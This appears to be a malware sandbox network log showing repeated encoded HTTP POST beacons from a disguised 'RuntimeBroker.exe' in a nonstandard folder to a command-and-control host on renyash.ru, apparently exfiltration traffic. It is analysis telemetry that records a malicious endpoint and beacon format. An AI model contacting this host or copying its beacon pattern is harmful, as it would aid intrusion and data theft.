                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          121192.168.2.450103104.21.38.84808128C:\Program Files\Windows Security\RuntimeBroker.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 1, 2025 04:23:34.731349945 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                          Host: 891781cm.renyash.ru
                                                                                                                          Content-Length: 1780
                                                                                                                          Expect: 100-continue
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Jan 1, 2025 04:23:35.084315062 CET1780OUTData Raw: 55 54 58 57 5f 5e 54 5e 55 5a 54 59 51 5c 55 5d 58 5e 5c 5b 59 54 52 59 5d 5b 46 5d 56 5d 56 51 42 5a 55 53 5d 5f 52 5a 58 54 51 59 5d 54 51 5a 52 51 5f 58 43 5b 54 59 53 5a 56 5b 54 53 53 59 5f 52 5d 5e 58 45 5a 51 5a 5c 58 5f 5c 53 59 51 59 52
                                                                                                                          Data Ascii: UTXW_^T^UZTYQ\U]X^\[YTRY][F]V]VQBZUS]_RZXTQY]TQZRQ_XC[TYSZV[TSSY_R]^XEZQZ\X_\SYQYRZVVX\Y__XTX\QP[SX]X[FTTQ^^YZ\S\_PW_]Z]XXQQW[ZXZQ_VY^\X\X[Q_BXVZ[VTUVUAC]Y]V^YQFP_B\XTSPCU^V_TQF[Z]ZYSZ + %=)Y*X<3*Q:$;$)&<Y,\<?*#^!'^)
                                                                                                                          Jan 1, 2025 04:23:35.203098059 CET25INHTTP/1.1 100 Continue
                                                                                                                          Jan 1, 2025 04:23:35.381494999 CET957INHTTP/1.1 200 OK
                                                                                                                          Date: Wed, 01 Jan 2025 03:23:35 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: keep-alive
                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GgaEfTAVlcY9Ao%2BsptajdAx1iouF5irqeR%2F4VN5ttkPbXsDktsrCPp3k7Hv8BgrSO73JEVjMUSs87eKr4pG%2BRh4YNbJw3Mhs0aUkCQh9Tfq3eqT0l%2FSPXLXVfxKpkRr%2Fk4aRqngY"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8faf6438bebe6a4e-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=4592&min_rtt=1759&rtt_var=6326&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2124&delivery_rate=59769&cwnd=201&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                          Data Raw: 39 38 0d 0a 03 1e 21 08 27 15 05 5c 29 3e 32 1e 2f 2c 23 51 32 59 36 5f 24 33 33 01 26 3d 35 14 2e 38 33 05 3c 15 2c 07 25 14 3d 5a 37 32 3e 5b 32 0c 2e 5d 04 1d 26 01 2a 04 2e 59 3f 2f 36 07 29 22 20 5f 24 09 24 05 25 0a 3f 01 26 3d 2e 12 22 54 2f 56 27 20 27 0a 2a 39 33 1d 27 04 3d 08 21 2a 2e 57 0d 12 21 0c 25 2e 17 55 29 08 24 56 35 02 09 57 25 2c 34 0f 24 02 27 0f 20 38 04 10 29 06 23 02 22 0e 39 12 25 3a 09 58 36 17 21 10 22 33 22 54 20 03 2f 54 05 3d 56 4f 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 98!'\)>2/,#Q2Y6_$33&=5.83<,%=Z72>[2.]&*.Y?/6)" _$$%?&=."T/V' '*93'=!*.W!%.U)$V5W%,4$' 8)#"9%:X6!"3"T /T=VO0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          122192.168.2.450104104.21.38.84808128C:\Program Files\Windows Security\RuntimeBroker.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 1, 2025 04:23:34.853179932 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                          Host: 891781cm.renyash.ru
                                                                                                                          Content-Length: 1056
                                                                                                                          Expect: 100-continue
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Jan 1, 2025 04:23:35.209280014 CET1056OUTData Raw: 50 53 5d 56 5f 5b 51 5d 55 5a 54 59 51 5a 55 54 58 5f 5c 5d 59 54 52 52 5d 5b 46 5d 56 5d 56 51 42 5a 55 53 5d 5f 52 5a 58 54 51 59 5d 54 51 5a 52 51 5f 58 43 5b 54 59 53 5a 56 5b 54 53 53 59 5f 52 5d 5e 58 45 5a 51 5a 5c 58 5f 5c 53 59 51 59 52
                                                                                                                          Data Ascii: PS]V_[Q]UZTYQZUTX_\]YTRR][F]V]VQBZUS]_RZXTQY]TQZRQ_XC[TYSZV[TSSY_R]^XEZQZ\X_\SYQYRZVVX\Y__XTX\QP[SX]X[FTTQ^^YZ\S\_PW_]Z]XXQQW[ZXZQ_VY^\X\X[Q_BXVZ[VTUVUAC]Y]V^YQFP_B\XTSPCU^V_TQF[Z]ZYSZ )/#>1=>?[&4*P:7'"&?$-><. *<#^!'^)#
                                                                                                                          Jan 1, 2025 04:23:35.320928097 CET25INHTTP/1.1 100 Continue
                                                                                                                          Jan 1, 2025 04:23:35.594366074 CET805INHTTP/1.1 200 OK
                                                                                                                          Date: Wed, 01 Jan 2025 03:23:35 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: keep-alive
                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=F9UKfae19XUgisCp3qVfuJqdk7mB1EIeI%2ByKC7sMX7kPihq%2FNEz6AZsY37vJcUNsjCE4oKLw6lw0dDL5uuKc4LxnWtbMdGgPHG9kdCp4HIZma3%2FGagdt6BWb8gI1eYsD4UFVvfcX"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8faf64397e8d428b-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=6343&min_rtt=5239&rtt_var=4173&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1400&delivery_rate=103730&cwnd=239&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                          Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 41V[X0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          123192.168.2.450111104.21.38.84808128C:\Program Files\Windows Security\RuntimeBroker.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 1, 2025 04:23:35.744132996 CET320OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                          Host: 891781cm.renyash.ru
                                                                                                                          Content-Length: 1056
                                                                                                                          Expect: 100-continue
                                                                                                                          Jan 1, 2025 04:23:36.100008965 CET1056OUTData Raw: 55 56 58 57 5f 5a 51 5f 55 5a 54 59 51 5a 55 53 58 52 5c 54 59 5c 52 5d 5d 5b 46 5d 56 5d 56 51 42 5a 55 53 5d 5f 52 5a 58 54 51 59 5d 54 51 5a 52 51 5f 58 43 5b 54 59 53 5a 56 5b 54 53 53 59 5f 52 5d 5e 58 45 5a 51 5a 5c 58 5f 5c 53 59 51 59 52
                                                                                                                          Data Ascii: UVXW_ZQ_UZTYQZUSXR\TY\R]][F]V]VQBZUS]_RZXTQY]TQZRQ_XC[TYSZV[TSSY_R]^XEZQZ\X_\SYQYRZVVX\Y__XTX\QP[SX]X[FTTQ^^YZ\S\_PW_]Z]XXQQW[ZXZQ_VY^\X\X[Q_BXVZ[VTUVUAC]Y]V^YQFP_B\XTSPCU^V_TQF[Z]ZYSZ \+?5Y#;*21]>=($>:;$Y"3/4[<7)#^!'^)#
                                                                                                                          Jan 1, 2025 04:23:36.207395077 CET25INHTTP/1.1 100 Continue
                                                                                                                          Jan 1, 2025 04:23:36.392963886 CET810INHTTP/1.1 200 OK
                                                                                                                          Date: Wed, 01 Jan 2025 03:23:36 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: keep-alive
                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2krJYyi52FdKbAsVxTBEjJVmW552OcSqtWTAvcxGf0CfYY9UTSKkPFfe1bkZp%2FYnpZu81rIBviHRHVy1B2Bd%2FnH52VSIyi%2B78SbcaU%2BxBsH3sA4j4Z29HWUha%2FJMmybyjKiGoU%2Br"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8faf643f0d004246-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=3887&min_rtt=1766&rtt_var=4905&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1376&delivery_rate=77908&cwnd=228&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                          Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 41V[X0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          124192.168.2.450116104.21.38.84808128C:\Program Files\Windows Security\RuntimeBroker.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 1, 2025 04:23:36.521663904 CET320OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                          Host: 891781cm.renyash.ru
                                                                                                                          Content-Length: 1048
                                                                                                                          Expect: 100-continue
                                                                                                                          Jan 1, 2025 04:23:36.881247997 CET1048OUTData Raw: 55 57 58 5c 5f 5e 54 5f 55 5a 54 59 51 5b 55 56 58 59 5c 5d 59 5c 52 5a 5d 5b 46 5d 56 5d 56 51 42 5a 55 53 5d 5f 52 5a 58 54 51 59 5d 54 51 5a 52 51 5f 58 43 5b 54 59 53 5a 56 5b 54 53 53 59 5f 52 5d 5e 58 45 5a 51 5a 5c 58 5f 5c 53 59 51 59 52
                                                                                                                          Data Ascii: UWX\_^T_UZTYQ[UVXY\]Y\RZ][F]V]VQBZUS]_RZXTQY]TQZRQ_XC[TYSZV[TSSY_R]^XEZQZ\X_\SYQYRZVVX\Y__XTX\QP[SX]X[FTTQ^^YZ\S\_PW_]Z]XXQQW[ZXZQ_VY^\X\X[Q_BXVZ[VTUVUAC]Y]V^YQFP_B\XTSPCU^V_TQF[Z]ZYSZ <1X ;=^&9>>['B&W:';02U0Z?X/ [<=;)<#^!'^)+
                                                                                                                          Jan 1, 2025 04:23:36.974251986 CET25INHTTP/1.1 100 Continue
                                                                                                                          Jan 1, 2025 04:23:37.249808073 CET804INHTTP/1.1 200 OK
                                                                                                                          Date: Wed, 01 Jan 2025 03:23:37 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: keep-alive
                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oHAn9B%2BtWvBThHyLYiKT6XagiO9OsIQjP8i5RYpkwJcS4vlmVCuw5gEYKjWEKsWf4ct3MF%2BfBHhIVq1j6x1VFEbsYiAeyGJyJgkkQTL2KX%2BRxEoF9hP01PwW3qMZ4fhA0CvJbNNd"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8faf6443caff42ec-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1831&min_rtt=1773&rtt_var=781&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1368&delivery_rate=651785&cwnd=182&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                          Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 41V[X0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          125192.168.2.450125104.21.38.84808128C:\Program Files\Windows Security\RuntimeBroker.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 1, 2025 04:23:37.426214933 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                          Host: 891781cm.renyash.ru
                                                                                                                          Content-Length: 1056
                                                                                                                          Expect: 100-continue
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Jan 1, 2025 04:23:37.772000074 CET1056OUTData Raw: 55 50 58 57 5f 5e 54 5d 55 5a 54 59 51 5c 55 53 58 5a 5c 5b 59 52 52 5a 5d 5b 46 5d 56 5d 56 51 42 5a 55 53 5d 5f 52 5a 58 54 51 59 5d 54 51 5a 52 51 5f 58 43 5b 54 59 53 5a 56 5b 54 53 53 59 5f 52 5d 5e 58 45 5a 51 5a 5c 58 5f 5c 53 59 51 59 52
                                                                                                                          Data Ascii: UPXW_^T]UZTYQ\USXZ\[YRRZ][F]V]VQBZUS]_RZXTQY]TQZRQ_XC[TYSZV[TSSY_R]^XEZQZ\X_\SYQYRZVVX\Y__XTX\QP[SX]X[FTTQ^^YZ\S\_PW_]Z]XXQQW[ZXZQ_VY^\X\X[Q_BXVZ[VTUVUAC]Y]V^YQFP_B\XTSPCU^V_TQF[Z]ZYSZ <,> ;![1>=[*- $",7;3<"'<8.#( >#^!'^)
                                                                                                                          Jan 1, 2025 04:23:37.879137039 CET25INHTTP/1.1 100 Continue
                                                                                                                          Jan 1, 2025 04:23:38.140454054 CET812INHTTP/1.1 200 OK
                                                                                                                          Date: Wed, 01 Jan 2025 03:23:38 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: keep-alive
                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=K%2FjYCbMy4ljSqj5QpbR95dPCYwD3ddRLVZzbbcVgeLHlhPIgL8O%2BCBIN4%2BaSyjOBITl4OZHeei9s0KTKhyXtRWWTGPFZ3HYSqb8dvAgLEml6%2Bba4FXR%2B7iuPA4h27hTsdm%2FNcZm%2B"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8faf64497e89c337-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=3564&min_rtt=1723&rtt_var=4329&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1400&delivery_rate=88726&cwnd=202&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                          Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 41V[X0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          126192.168.2.450132104.21.38.84808128C:\Program Files\Windows Security\RuntimeBroker.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 1, 2025 04:23:38.273736954 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                          Host: 891781cm.renyash.ru
                                                                                                                          Content-Length: 1056
                                                                                                                          Expect: 100-continue
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Jan 1, 2025 04:23:38.631524086 CET1056OUTData Raw: 50 53 5d 57 5a 58 51 5f 55 5a 54 59 51 5a 55 57 58 59 5c 5e 59 51 52 58 5d 5b 46 5d 56 5d 56 51 42 5a 55 53 5d 5f 52 5a 58 54 51 59 5d 54 51 5a 52 51 5f 58 43 5b 54 59 53 5a 56 5b 54 53 53 59 5f 52 5d 5e 58 45 5a 51 5a 5c 58 5f 5c 53 59 51 59 52
                                                                                                                          Data Ascii: PS]WZXQ_UZTYQZUWXY\^YQRX][F]V]VQBZUS]_RZXTQY]TQZRQ_XC[TYSZV[TSSY_R]^XEZQZ\X_\SYQYRZVVX\Y__XTX\QP[SX]X[FTTQ^^YZ\S\_PW_]Z]XXQQW[ZXZQ_VY^\X\X[Q_BXVZ[VTUVUAC]Y]V^YQFP_B\XTSPCU^V_TQF[Z]ZYSZ#(<=Y!;:2X5[=.+'-9$4^'Y>$/[,4\=>$V)#^!'^)#
                                                                                                                          Jan 1, 2025 04:23:38.769309998 CET25INHTTP/1.1 100 Continue
                                                                                                                          Jan 1, 2025 04:23:38.938507080 CET806INHTTP/1.1 200 OK
                                                                                                                          Date: Wed, 01 Jan 2025 03:23:38 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: keep-alive
                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cxHBQSA4ewyU2FlHWuJ9%2B501pI4F%2BWtcp4Mxx6Bw6fuwu3iHcLt3CqjHgee2dHndJ%2BRSgFRkaZjDBhJYvssSsOSBHHdeImY9snoo3YqRQFo71Q9LMdnv%2F0KxiFKNwthQgaqnJWFW"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8faf644f0a9fc44a-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=3860&min_rtt=1467&rtt_var=5337&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1400&delivery_rate=70818&cwnd=227&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                          Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 41V[X0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          127192.168.2.450134104.21.38.84808128C:\Program Files\Windows Security\RuntimeBroker.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 1, 2025 04:23:39.075460911 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                          Host: 891781cm.renyash.ru
                                                                                                                          Content-Length: 1056
                                                                                                                          Expect: 100-continue
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Jan 1, 2025 04:23:39.428483009 CET1056OUTData Raw: 55 5e 5d 54 5a 5b 51 55 55 5a 54 59 51 58 55 50 58 5a 5c 55 59 55 52 5c 5d 5b 46 5d 56 5d 56 51 42 5a 55 53 5d 5f 52 5a 58 54 51 59 5d 54 51 5a 52 51 5f 58 43 5b 54 59 53 5a 56 5b 54 53 53 59 5f 52 5d 5e 58 45 5a 51 5a 5c 58 5f 5c 53 59 51 59 52
                                                                                                                          Data Ascii: U^]TZ[QUUZTYQXUPXZ\UYUR\][F]V]VQBZUS]_RZXTQY]TQZRQ_XC[TYSZV[TSSY_R]^XEZQZ\X_\SYQYRZVVX\Y__XTX\QP[SX]X[FTTQ^^YZ\S\_PW_]Z]XXQQW[ZXZQ_VY^\X\X[Q_BXVZ[VTUVUAC]Y]V^YQFP_B\XTSPCU^V_TQF[Z]ZYSZ#+ =22*<'7:T.B4^$,>'Y/7(.T*#^!'^)+
                                                                                                                          Jan 1, 2025 04:23:39.519325018 CET25INHTTP/1.1 100 Continue
                                                                                                                          Jan 1, 2025 04:23:39.702217102 CET805INHTTP/1.1 200 OK
                                                                                                                          Date: Wed, 01 Jan 2025 03:23:39 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: keep-alive
                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=793BIXK%2BVdh9E5Z9QWueMt8zbWeuGe2e7SOKz1WkuPoSM640UdJ45%2BvUGqITEcRZ2ww8vg6IUlk1cJr2M0hVKDMSsm%2FDOc50Np8qJrFHvzh04HxYewiAWufEbaAM9lLPN%2BLXsOkv"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8faf6453bb224374-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1737&min_rtt=1597&rtt_var=879&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1400&delivery_rate=536962&cwnd=31&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                          Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 41V[X0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          128192.168.2.450135104.21.38.84808128C:\Program Files\Windows Security\RuntimeBroker.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 1, 2025 04:23:39.828537941 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                          Host: 891781cm.renyash.ru
                                                                                                                          Content-Length: 1056
                                                                                                                          Expect: 100-continue
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Jan 1, 2025 04:23:40.178105116 CET1056OUTData Raw: 50 53 5d 57 5f 5c 51 5e 55 5a 54 59 51 53 55 50 58 5b 5c 59 59 5c 52 53 5d 5b 46 5d 56 5d 56 51 42 5a 55 53 5d 5f 52 5a 58 54 51 59 5d 54 51 5a 52 51 5f 58 43 5b 54 59 53 5a 56 5b 54 53 53 59 5f 52 5d 5e 58 45 5a 51 5a 5c 58 5f 5c 53 59 51 59 52
                                                                                                                          Data Ascii: PS]W_\Q^UZTYQSUPX[\YY\RS][F]V]VQBZUS]_RZXTQY]TQZRQ_XC[TYSZV[TSSY_R]^XEZQZ\X_\SYQYRZVVX\Y__XTX\QP[SX]X[FTTQ^^YZ\S\_PW_]Z]XXQQW[ZXZQ_VY^\X\X[Q_BXVZ[VTUVUAC]Y]V^YQFP_B\XTSPCU^V_TQF[Z]ZYSZ#(,!#+)1-=Y*'Z0$=94]3Y1$/8-$^<>V)<#^!'^)
                                                                                                                          Jan 1, 2025 04:23:40.275326967 CET25INHTTP/1.1 100 Continue


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          129192.168.2.450136104.21.38.84808128C:\Program Files\Windows Security\RuntimeBroker.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 1, 2025 04:23:40.403426886 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                          Host: 891781cm.renyash.ru
                                                                                                                          Content-Length: 1756
                                                                                                                          Expect: 100-continue
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Jan 1, 2025 04:23:40.757762909 CET1756OUTData Raw: 50 54 58 52 5a 59 51 5e 55 5a 54 59 51 52 55 54 58 5f 5c 54 59 52 52 5f 5d 5b 46 5d 56 5d 56 51 42 5a 55 53 5d 5f 52 5a 58 54 51 59 5d 54 51 5a 52 51 5f 58 43 5b 54 59 53 5a 56 5b 54 53 53 59 5f 52 5d 5e 58 45 5a 51 5a 5c 58 5f 5c 53 59 51 59 52
                                                                                                                          Data Ascii: PTXRZYQ^UZTYQRUTX_\TYRR_][F]V]VQBZUS]_RZXTQY]TQZRQ_XC[TYSZV[TSSY_R]^XEZQZ\X_\SYQYRZVVX\Y__XTX\QP[SX]X[FTTQ^^YZ\S\_PW_]Z]XXQQW[ZXZQ_VY^\X\X[Q_BXVZ[VTUVUAC]Y]V^YQFP_B\XTSPCU^V_TQF[Z]ZYSZ#+!] +&>!)X,$4.,7$$?$<;(^?.>#^!'^)
                                                                                                                          Jan 1, 2025 04:23:40.847615957 CET25INHTTP/1.1 100 Continue
                                                                                                                          Jan 1, 2025 04:23:41.103960991 CET956INHTTP/1.1 200 OK
                                                                                                                          Date: Wed, 01 Jan 2025 03:23:41 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: keep-alive
                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pNzDfP4XfDaF2cxK2yQpN7gssghOELPyY2J0eQxovPQX7xdLfnk6iK4ZaiHjL1UfVcZA1NkZPE3NE2e8C9gTL0A02Y%2Bel8b1drf%2B8J7DiQMhLWfGvc4%2B8pr%2Bh02AhM72UpQSVHvu"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8faf645c0a225e62-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1949&min_rtt=1627&rtt_var=1256&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2100&delivery_rate=346793&cwnd=138&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                          Data Raw: 39 38 0d 0a 03 1e 22 50 30 3b 37 16 29 3e 36 10 3b 3c 37 1c 32 11 2e 5d 24 20 37 00 25 2d 35 5c 2d 38 2f 00 2b 05 27 13 32 5c 22 01 20 0f 2e 10 31 0c 2e 5d 04 1d 25 13 2a 29 3d 06 28 59 2d 5e 29 0c 02 14 26 34 24 03 26 1a 0a 13 24 2d 25 01 22 1c 2f 1e 30 0d 01 0e 2a 3a 3f 13 27 03 26 50 37 00 2e 57 0d 12 22 57 25 00 22 0c 29 22 34 56 20 3f 3f 56 24 01 23 51 24 05 3c 12 23 06 3e 1f 3d 06 20 11 21 27 3d 50 25 3a 30 07 21 29 00 04 22 19 22 54 20 03 2f 54 05 3d 56 4f 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 98"P0;7)>6;<72.]$ 7%-5\-8/+'2\" .1.]%*)=(Y-^)&4$&$-%"/0*:?'&P7.W"W%")"4V ??V$#Q$<#>= !'=P%:0!)""T /T=VO0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          130192.168.2.450137104.21.38.84808128C:\Program Files\Windows Security\RuntimeBroker.exe
                                                                                                                          TimestampBytes transferredDirectionData
